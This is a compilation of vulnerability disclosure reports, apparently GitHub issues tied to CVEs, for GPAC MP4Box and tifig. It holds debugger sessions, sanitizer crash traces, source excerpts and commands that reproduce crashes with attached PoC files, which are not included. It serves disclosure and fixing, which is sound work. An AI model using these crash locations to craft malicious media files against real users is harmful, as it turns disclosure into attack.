       0x7ffff4b841e7 <gf_filter_pid_set_property+215>    jne    gf_filter_pid_set_property+1447                <gf_filter_pid_set_property+1447>
     
       0x7ffff4b841ed <gf_filter_pid_set_property+221>    cmp    r12, qword ptr [r12]
       0x7ffff4b841f1 <gf_filter_pid_set_property+225>    jne    gf_filter_pid_set_property+1016                <gf_filter_pid_set_property+1016>
     
       0x7ffff4b841f7 <gf_filter_pid_set_property+231>    mov    esi, r14d
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    In file: /home/fuzz/gpac2.1/gpac/src/filter_core/filter_pid.c
       5296 
       5297 GF_EXPORT
       5298 GF_Err gf_filter_pid_set_property(GF_FilterPid *pid, u32 prop_4cc, const GF_PropertyValue *value)
       5299 {
       5300 	if (!prop_4cc) return GF_BAD_PARAM;
     ► 5301 	return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE);
       5302 }
       5303 
       5304 GF_EXPORT
       5305 GF_Err gf_filter_pid_set_property_str(GF_FilterPid *pid, const char *name, const GF_PropertyValue *value)
       5306 {
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    00:0000│ rsp 0x7ffffffe8f30 ◂— 0x0
    01:0008│     0x7ffffffe8f38 ◂— 0x0
    02:0010│     0x7ffffffe8f40 —▸ 0x7ffffffe9030 —▸ 0x7ffff54af2c0 ◂— 0x6372636170672e /* '.gpacrc' */
    03:0018│     0x7ffffffe8f48 —▸ 0x7ffffffe8f50 ◂— 0x41b58ab3
    04:0020│ rbx 0x7ffffffe8f50 ◂— 0x41b58ab3
    05:0028│     0x7ffffffe8f58 —▸ 0x7ffff5640eff ◂— '1 48 100 11 szName:5290'
    06:0030│     0x7ffffffe8f60 —▸ 0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 
    07:0038│     0x7ffffffe8f68 —▸ 0x618000000c80 —▸ 0x7ffff6de03e0 (FileInRegister) —▸ 0x7ffff56a6580 ◂— 0x6e6966 /* 'fin' */
    ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     ► f 0   0x7ffff4b841c6 gf_filter_pid_set_property+182
       f 1   0x7ffff4b841c6 gf_filter_pid_set_property+182
       f 2   0x7ffff4c06993 gf_filter_pid_raw_new+595
       f 3   0x7ffff4dc30b1 filein_process+2721
       f 4   0x7ffff4c0eb6d gf_filter_process_task+3581
       f 5   0x7ffff4bd4953 gf_fs_thread_proc+2275
       f 6   0x7ffff4be0c67 gf_fs_run+455
       f 7   0x7ffff462a677 gf_media_import+10263
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301
    #1  gf_filter_pid_set_property (pid=pid@entry=0x613000000040, prop_4cc=prop_4cc@entry=1347244884, value=0x7ffffffe9150) at filter_core/filter_pid.c:5301
    #2  0x00007ffff4c06993 in gf_filter_pid_raw_new (filter=filter@entry=0x618000000c80, url=0x603000000f40 "../../../test/segv2/poc", local_file=<optimized out>, mime_type=<optimized out>, fext=<optimized out>, probe_data=<optimized out>, probe_size=<optimized out>, trust_mime=<optimized out>, out_pid=<optimized out>) at filter_core/filter.c:3891
    #3  0x00007ffff4dc30b1 in filein_process (filter=<optimized out>) at filters/in_file.c:481
    #4  0x00007ffff4c0eb6d in gf_filter_process_task (task=0x607000000b10) at filter_core/filter.c:2639
    #5  0x00007ffff4bd4953 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000000110) at filter_core/filter_session.c:1857
    #6  0x00007ffff4be0c67 in gf_fs_run (fsess=fsess@entry=0x616000000080) at filter_core/filter_session.c:2118
    #7  0x00007ffff462a677 in gf_media_import (importer=importer@entry=0x7ffffffeaa50) at media_tools/media_import.c:1226
    #8  0x0000555555651a12 in convert_file_info (inName=<optimized out>, track_id=0x555555764fb0 <info_track_id>) at fileimport.c:130
    #9  0x000055555562279f in mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6265
    #10 0x00007ffff1949083 in __libc_start_main (main=0x5555555f6a00 <main>, argc=3, argv=0x7fffffffe488, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe478) at ../csu/libc-start.c:308
    #11 0x00005555555f6afe in _start () at mp4box.c:6811
    pwndbg> p pid
    $2 = (GF_FilterPid *) 0x613000000040
    pwndbg> c
    Continuing.
    [AVC|H264] Warning: Error parsing NAL unit
    
    Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9810, dyn_name=0x0, prop_name=0x0, prop_4cc=1146050121, pid=0x0) at filter_core/filter_pid.c:5301
    5301		return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE);
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ............
    until.......
    
    pwndbg> p pid
    $3 = (GF_FilterPid *) 0x0
    pwndbg> i b
    Num     Type           Disp Enb Address            What
    1       breakpoint     keep y   <MULTIPLE>         
    	breakpoint already hit 9 times
    1.1                         y   0x00007ffff4b829f6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.2                         y   0x00007ffff4b8314e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.3                         y   0x00007ffff4b834d1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.4                         y   0x00007ffff4b8393e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.5                         y   0x00007ffff4b83cc1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.6                         y   0x00007ffff4b841c6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    pwndbg> n
    filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid'
    [Inferior 1 (process 2239158) exited with code 01]
    
    

**source code**

    5246 static GF_Err gf_filter_pid_set_property_full(GF_FilterPid *pid, u32 prop_4cc, const char *prop_name, char *dyn_name, const GF_PropertyValue *value, Bool is_info)
    5247 {
    5248 	GF_PropertyMap *map;
    5249 	const GF_PropertyValue *oldp;
    5250	if (PID_IS_INPUT(pid)) {    //**here**//
    5251		GF_LOG(GF_LOG_ERROR, GF_LOG_FILTER, ("Attempt to write property on input PID in filter %s - ignoring\n", pid->filter->name));
    5252		return GF_BAD_PARAM;
    5253	}

CVE-2022-36186: A NULL pointer dereference in gf_filter_pid_set_property_full  · Issue #2223 · gpac/gpac

GPAC mp4box 2.1-DEV-revUNKNOWN-master has a use-after-free vulnerability in function gf_isom_dovi_config_get. This vulnerability was fixed in commit fef6242.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Heap use after free in fuction gf_isom_dovi_config_get located in isomedia/avc_ext.c:2490

**System info**

ubuntu 20.04 lts

**version info:**

     ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**compile**

    ./configure --enable-sanitizer 
    make
    

**crash command:**  
./MP4Box -info  poc

**poc :**  
poc.zip

**Crash output:**

    
    [iso file] Unknown box type mp4u in parent stsd
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Unknown box type drzf in parent dinf
    [iso file] Missing dref box in dinf
    [iso file] Incomplete box mdat - start 11495 size 853076
    [iso file] Incomplete file while reading for dump - aborting parsing
    # Movie Info - 5 tracks - TimeScale 90000
    Duration 00:00:22.839 (recomputed 00:00:22.848)
    Fragmented: no
    Progressive (moov before mdat)
    Major Brand isom - version 1 - compatible brands:
    Created: GMT Wed Sep 14 06:08:31 2078
    Modified: GMT Wed Sep 14 06:08:33 2078
    
    File has root IOD (96 bytes)
    Scene PL 0xff - Graphics PL 0xff - OD PL 0xff
    Visual PL: Simple Profile @ Level 1 (0x01)
    Audio PL: High Quality Audio Profile @ Level 2 (0x0f)
    1 UDTA types: 
    	hnti: 
    
    # Track 1 Info - ID 1 - TimeScale 90000
    Media Duration 00:00:22.800 
    Track flags: Enabled
    Media Info: Language "Undetermined (und)" - Type "vide:mp4u" - 342 samples
    Visual Sample Entry Info: width=176 height=144 (depth=24 bits)
    Visual Track layout: x=0 y=0 width=176 height=144
    =================================================================
    ==2234976==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f000000130 at pc 0x7fbba822fbc0 bp 0x7ffe87b46740 sp 0x7ffe87b46730
    READ of size 8 at 0x60f000000130 thread T0
        #0 0x7fbba822fbbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490
        #1 0x55f3db03107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862
        #2 0x55f3db03ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994
        #3 0x55f3db012ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367
        #4 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308
        #5 0x55f3dafe7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd)
    
    0x60f000000130 is located 0 bytes inside of 168-byte region [0x60f000000130,0x60f0000001d8)
    freed by thread T0 here:
        #0 0x7fbbab63440f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122
        #1 0x7fbba825252d in unkn_box_read isomedia/box_code_base.c:793
        #2 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #3 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #4 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753
        #5 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789
        #6 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #7 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #8 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753
        #9 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789
        #10 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #11 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #12 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753
        #13 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789
        #14 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #15 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #16 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753
        #17 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #18 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #19 0x7fbba8302a35 in gf_isom_parse_root_box isomedia/box_funcs.c:38
        #20 0x7fbba832babc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373
        #21 0x7fbba8331c2f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860
        #22 0x7fbba8331c2f in gf_isom_open_file isomedia/isom_intern.c:980
        #23 0x55f3db00c549 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6181
        #24 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308
    
    previously allocated by thread T0 here:
        #0 0x7fbbab634808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x7fbba82521ef in unkn_box_read isomedia/box_code_base.c:768
        #2 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #3 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #4 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753
        #5 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789
        #6 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #7 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #8 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753
        #9 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789
        #10 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #11 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #12 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753
        #13 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789
        #14 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #15 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #16 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753
        #17 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860
        #18 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #19 0x7fbba8302a35 in gf_isom_parse_root_box isomedia/box_funcs.c:38
        #20 0x7fbba832babc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373
        #21 0x7fbba8331c2f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860
        #22 0x7fbba8331c2f in gf_isom_open_file isomedia/isom_intern.c:980
        #23 0x55f3db00c549 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6181
        #24 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308
    
    SUMMARY: AddressSanitizer: heap-use-after-free isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get
    Shadow bytes around the buggy address:
      0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
    =>0x0c1e7fff8020: fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd
      0x0c1e7fff8030: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
      0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2234976==ABORTING
    
    

**Impact**

can cause a program to crash, use unexpected values, or execute code.

Occurrences:  
avc\_ext.c:2490

ps: this test was still based on the newest mp4box+asan. The bug happened in avc\_ext.c:2490 which was the same location with the other issue i submitted (#2218). Maybe asan mistakenly reports "heap-use-after-free" instead of "heap-buffer-overflow". Pls check it again.

CVE-2022-36190: Heap Use After Free in function gf_isom_dovi_config_get  · Issue #2220 · gpac/gpac

tifig v0.2.2 was discovered to contain a memory leak via operator new[](unsigned long) at /asan/asan_new_delete.cpp.

**crash sample**

id0\_memory\_leakF9.zip

**command to reproduce**

../tifig -v -p [crash sample] /dev/null

**crash detail**

    ==74044==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 10 byte(s) in 1 object(s) allocated from:
        #0 0x4fab78 in operator new[](unsigned long) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_new_delete.cpp:102
        #1 0x4fe324 in sanityCheck(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/tifig/src/main.cpp:19:19
        #2 0x4fe810 in convert(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Opts&) /home/bupt/Desktop/tifig/src/main.cpp:46:5
        #3 0x518b1a in main /home/bupt/Desktop/tifig/src/main.cpp:179:22
        #4 0x7fbe4f6c3c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: 10 byte(s) leaked in 1 allocation(s).
    
    

\### crash sample

id27\_memory\_leak\_F7.zip

**command to reproduce**

../tifig -v -p [crash sample] /dev/null

**crash detail**

    ==74125==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 17301504 byte(s) in 22 object(s) allocated from:
        #0 0x4b4e50 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x501db8 in decodeFrame(std::vector<unsigned char, std::allocator<unsigned char> >) /home/bupt/Desktop/tifig/src/hevc_decode.hpp:107:31
    
    Direct leak of 1145232 byte(s) in 88 object(s) allocated from:
        #0 0x4b5a9d in posix_memalign /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:226
        #1 0x7f1462f396d2 in av_malloc (/usr/lib/x86_64-linux-gnu/libavutil.so.55+0x316d2)
    
    Direct leak of 5632 byte(s) in 22 object(s) allocated from:
        #0 0x4fab78 in operator new[](unsigned long) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_new_delete.cpp:102
        #1 0x501d15 in decodeFrame(std::vector<unsigned char, std::allocator<unsigned char> >) /home/bupt/Desktop/tifig/src/hevc_decode.hpp:87:30
    
    Direct leak of 1936 byte(s) in 22 object(s) allocated from:
        #0 0x4b5a9d in posix_memalign /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:226
        #1 0x7f1462f396d2 in av_malloc (/usr/lib/x86_64-linux-gnu/libavutil.so.55+0x316d2)
        #2 0x5b8b48 in std::_Function_handler<std::unique_ptr<std::__future_base::_Result_base, std::__future_base::_Result_base::_Deleter> (), std::__future_base::_Task_setter<std::unique_ptr<std::__future_base::_Result<RgbData>, std::__future_base::_Result_base::_Deleter>, std::thread::_Invoker<std::tuple<RgbData (*)(std::vector<unsigned char, std::allocator<unsigned char> >), std::vector<unsigned char, std::allocator<unsigned char> > > >, RgbData> >::_M_invoke(std::_Any_data const&) /usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/std_function.h:301:9
        #3 0x5b86b5 in std::function<std::unique_ptr<std::__future_base::_Result_base, std::__future_base::_Result_base::_Deleter> ()>::operator()() const /usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/std_function.h:706:14
        #4 0x5b86b5 in std::__future_base::_State_baseV2::_M_do_set(std::function<std::unique_ptr<std::__future_base::_Result_base, std::__future_base::_Result_base::_Deleter> ()>*, bool*) /usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/future:561:27
        #5 0x7f14648c6906 in __pthread_once_slow /build/glibc-CVJwZb/glibc-2.27/nptl/pthread_once.c:116
    
    Direct leak of 10 byte(s) in 1 object(s) allocated from:
        #0 0x4fab78 in operator new[](unsigned long) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_new_delete.cpp:102
        #1 0x4fe324 in sanityCheck(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/tifig/src/main.cpp:19:19
        #2 0x4fe810 in convert(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Opts&) /home/bupt/Desktop/tifig/src/main.cpp:46:5
        #3 0x518b1a in main /home/bupt/Desktop/tifig/src/main.cpp:179:22
        #4 0x7f1460d4cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    Indirect leak of 9347778 byte(s) in 572 object(s) allocated from:
        #0 0x4b5a9d in posix_memalign /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:226
        #1 0x7f1462f396d2 in av_malloc (/usr/lib/x86_64-linux-gnu/libavutil.so.55+0x316d2)
    
    SUMMARY: AddressSanitizer: 27802092 byte(s) leaked in 727 allocation(s).

CVE-2022-36152: Issues in this repor about memory leak · Issue #72 · monostream/tifig

tifig v0.2.2 was discovered to contain a segmentation violation via std::vector<unsigned int, std::allocator<unsigned int> >::size() const at /bits/stl_vector.h.

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==74081==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000006c2382 bp 0x000000000038 sp 0x7ffe63ff83a0 T0)
    ==74081==The signal is caused by a READ memory access.
    ==74081==Hint: address points to the zero page.
        #0 0x6c2382 in std::vector<unsigned int, std::allocator<unsigned int> >::size() const /usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_vector.h
        #1 0x6c2382 in std::vector<unsigned int, std::allocator<unsigned int> >::vector(std::vector<unsigned int, std::allocator<unsigned int> > const&) /usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_vector.h:327:19
        #2 0x6c2382 in SingleItemTypeReferenceBox::getToItemIds() const /home/bupt/Desktop/tifig/lib/heif/Srcs/common/itemreferencebox.cpp:84:12
        #3 0x5efc25 in HevcImageFileReader::readItem(MetaBox const&, unsigned int, std::vector<unsigned char, std::allocator<unsigned char> >&) const /home/bupt/Desktop/tifig/lib/heif/Srcs/reader/hevcimagefilereader.cpp:2028:47
        #4 0x5ee016 in HevcImageFileReader::getItemData(unsigned int, unsigned int, std::vector<unsigned char, std::allocator<unsigned char> >&) /home/bupt/Desktop/tifig/lib/heif/Srcs/reader/hevcimagefilereader.cpp:475:13
        #5 0x5fd6b3 in HevcImageFileReader::getItemDataWithDecoderParameters(unsigned int, unsigned int, unsigned int, std::vector<unsigned char, std::allocator<unsigned char> >&) /home/bupt/Desktop/tifig/lib/heif/Srcs/reader/hevcimagefilereader.cpp:770:5
        #6 0x5075ca in getImage(HevcImageFileReader&, unsigned int, unsigned int, Opts&) /home/bupt/Desktop/tifig/src/loader.hpp:65:16
        #7 0x4feaf9 in convert(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Opts&) /home/bupt/Desktop/tifig/src/main.cpp:79:17
        #8 0x518b1a in main /home/bupt/Desktop/tifig/src/main.cpp:179:22
        #9 0x7f3180c46c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #10 0x422889 in _start (/home/bupt/Desktop/tifig/build/tifig+0x422889)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_vector.h in std::vector<unsigned int, std::allocator<unsigned int> >::size() const
    ==74081==ABORTING

Tag

#c++